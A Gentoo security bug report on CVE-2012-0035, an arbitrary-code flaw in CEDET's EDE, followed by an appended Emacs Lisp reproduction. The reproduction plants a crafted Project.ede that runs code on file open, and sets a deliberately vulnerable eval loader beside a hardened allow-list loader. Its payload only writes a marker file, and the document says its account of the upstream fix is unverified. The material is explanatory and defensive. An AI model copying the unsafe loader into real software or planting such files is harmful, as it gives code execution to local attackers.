| Summary: | <app-emacs/cedet-1.0.1 : security flaw in EDE, local execution of arbitrary code (CVE-2012-0035) | | |
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Ulrich Müller <ulm> |
| Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
| Status: | RESOLVED FIXED | | |
| Severity: | normal | CC: | emacs |
| Priority: | Normal | | |
| Version: | unspecified | | |
| Hardware: | All | | |
| OS: | Linux | | |
| URL: | http://lists.gnu.org/archive/html/emacs-devel/2012-01/msg00387.html | | |
| Whiteboard: | B2 [glsa] | | |
| Package list: | | Runtime testing required: | --- |
Description
Ulrich Müller
2012-01-09 09:35:03 UTC
An updated patchball for Emacs is on its way to Gentoo mirrors; I'll commit the ebuild later today.

(In reply to comment #0)
> Adding xemacs team to CC for app-xemacs/cedet-common.

Sorry, this was wrong. The package (potentially) affected is app-xemacs/ede.

app-editors/emacs and app-xemacs/ede issues split off to bug 398239 and bug 398241 (after being told in #gentoo-security to do so).

Fixed in app-emacs/cedet-1.0-r1. CCing arch teams, please stabilise.

amd64 stable

cedet-1.0.1 has been released upstream, with the security fix included. Please stabilise this version instead.

(In reply to comment #4)
> cedet-1.0.1 has been released upstream, with the security fix included.
> Please stabilise this version instead.

Ok, thanks. Readded amd64 (sorry, guys).

Arches, please test and mark stable:
=app-emacs/cedet-1.0.1
Target keywords : "amd64 ppc sparc x86"

amd64 ok

amd64 stable, thanks Michael

x86 stable

sparc keywords dropped

ppc done; closing as last arch.

Filed new GLSA request.

Vulnerable version cedet-1.0 removed.

CVE-2012-0035 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0035): Untrusted search path vulnerability in EDE in CEDET before 1.0.1, as used in GNU Emacs before 23.4 and other products, allows local users to gain privileges via a crafted Lisp expression in a Project.ede file in the directory, or a parent directory, of an opened file.

This issue was resolved and addressed in GLSA 201401-31 at http://security.gentoo.org/glsa/glsa-201401-31.xml by GLSA coordinator Mikle Kolyada (Zlogene).
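Added example, not part of the bug report and not CEDET's or Gentoo's code: a small Emacs Lisp reproduction of the pattern the CVE text above describes. It walks up from an opened file looking for Project.ede, shows the vulnerable loader (the file's contents are read as a Lisp form and evaluated, so whoever can write to that directory or any parent gets code execution in the victim's Emacs), and pairs it with a loader that only evaluates files from an allow-listed or explicitly confirmed directory. Every `demo-*` name, the variable `demo-trusted-project-directories`, and the crafted Project.ede text are constructed for illustration; the allow-list-plus-prompt shape of the hardened loader mirrors how the upstream 1.0.1 / Emacs 23.4 fix is remembered to work, which should be checked against the upstream change linked in the URL field rather than taken from this snippet.

```elisp
;;; cve-2012-0035-demo.el --- illustrative reproduction, not CEDET code

;; ASSUMPTION: all demo-* names and the sample Project.ede below are made up
;; for this example. Requires Emacs 23+ for `locate-dominating-file'.

;; Constructed, attacker-controlled Project.ede. A real one holds an object
;; constructor form; this one hides a side effect in front of a fake one.
(defconst demo-malicious-project-ede
  "(progn
     (with-temp-file (expand-file-name \"ede-demo-pwned.txt\"
                                       temporary-file-directory)
       (insert \"arbitrary code ran while a file was opened\\n\"))
     ;; still return something that looks like a project object
     (list 'ede-proj-project :name \"evil\"))")

(defun demo-find-project-file (file)
  "Untrusted search path: from FILE's directory walk upward and return the
first Project.ede found, or nil.  Any parent directory counts."
  (let ((dir (locate-dominating-file
              (file-name-directory (expand-file-name file)) "Project.ede")))
    (and dir (expand-file-name "Project.ede" dir))))

(defun demo-load-project-unsafe (project-file)
  "The vulnerable pattern: read PROJECT-FILE as one Lisp form and eval it.
No check that the directory belongs to the user or was ever approved."
  (with-temp-buffer
    (insert-file-contents project-file)
    (eval (read (current-buffer)))))

(defvar demo-trusted-project-directories nil
  "Directories whose Project.ede may be evaluated without asking.
ASSUMPTION: stand-in for an allow-list, not the real EDE variable name.")

(defun demo-directory-trusted-p (dir)
  "Non-nil if DIR (normalised) is on the allow-list."
  (let ((dir (file-name-as-directory (expand-file-name dir))))
    (member dir (mapcar (lambda (d) (file-name-as-directory (expand-file-name d)))
                        demo-trusted-project-directories))))

(defun demo-load-project-safe (project-file)
  "Evaluate PROJECT-FILE only from an allow-listed directory or after the
user explicitly confirms; remember confirmations for this session."
  (let ((dir (file-name-directory project-file)))
    (cond
     ((demo-directory-trusted-p dir)
      (demo-load-project-unsafe project-file))
     ((yes-or-no-p (format "Load EDE project from untrusted directory %s? " dir))
      (add-to-list 'demo-trusted-project-directories dir)
      (demo-load-project-unsafe project-file))
     (t
      (message "Ignoring Project.ede in %s" dir)
      nil))))

(defun demo-run ()
  "Build a throwaway tree, plant the crafted Project.ede at its root, then
\"open\" a source file two levels below it with both loaders."
  (let* ((root (make-temp-file "ede-demo-" t))          ; temp directory
         (sub  (expand-file-name "src/deep" root))
         (src  (expand-file-name "main.c" sub)))
    (make-directory sub t)
    (with-temp-file src (insert "int main(void) { return 0; }\n"))
    (with-temp-file (expand-file-name "Project.ede" root)
      (insert demo-malicious-project-ede))
    ;; Vulnerable path: the attacker's progn runs, writing ede-demo-pwned.txt.
    (demo-load-project-unsafe (demo-find-project-file src))
    ;; Hardened path: prompts first; answering "no" returns nil and evaluates
    ;; nothing.  The same file is loaded silently once ROOT is on the list.
    (demo-load-project-safe (demo-find-project-file src))))
```

Evaluate the buffer and call `M-: (demo-run)`; in a vulnerable setup the first call is what happens implicitly when EDE is active and a file under such a tree is visited, which is why a shared checkout, a world-writable parent directory, or a colleague's tree on a multi-user host is enough for a local user to run code as the victim. The hardened loader does not make `eval` of the file safe; it only refuses to do it for directories the user never approved, so the real mitigation on this page is still upgrading to app-emacs/cedet-1.0.1 (or Emacs 23.4) as the GLSA says.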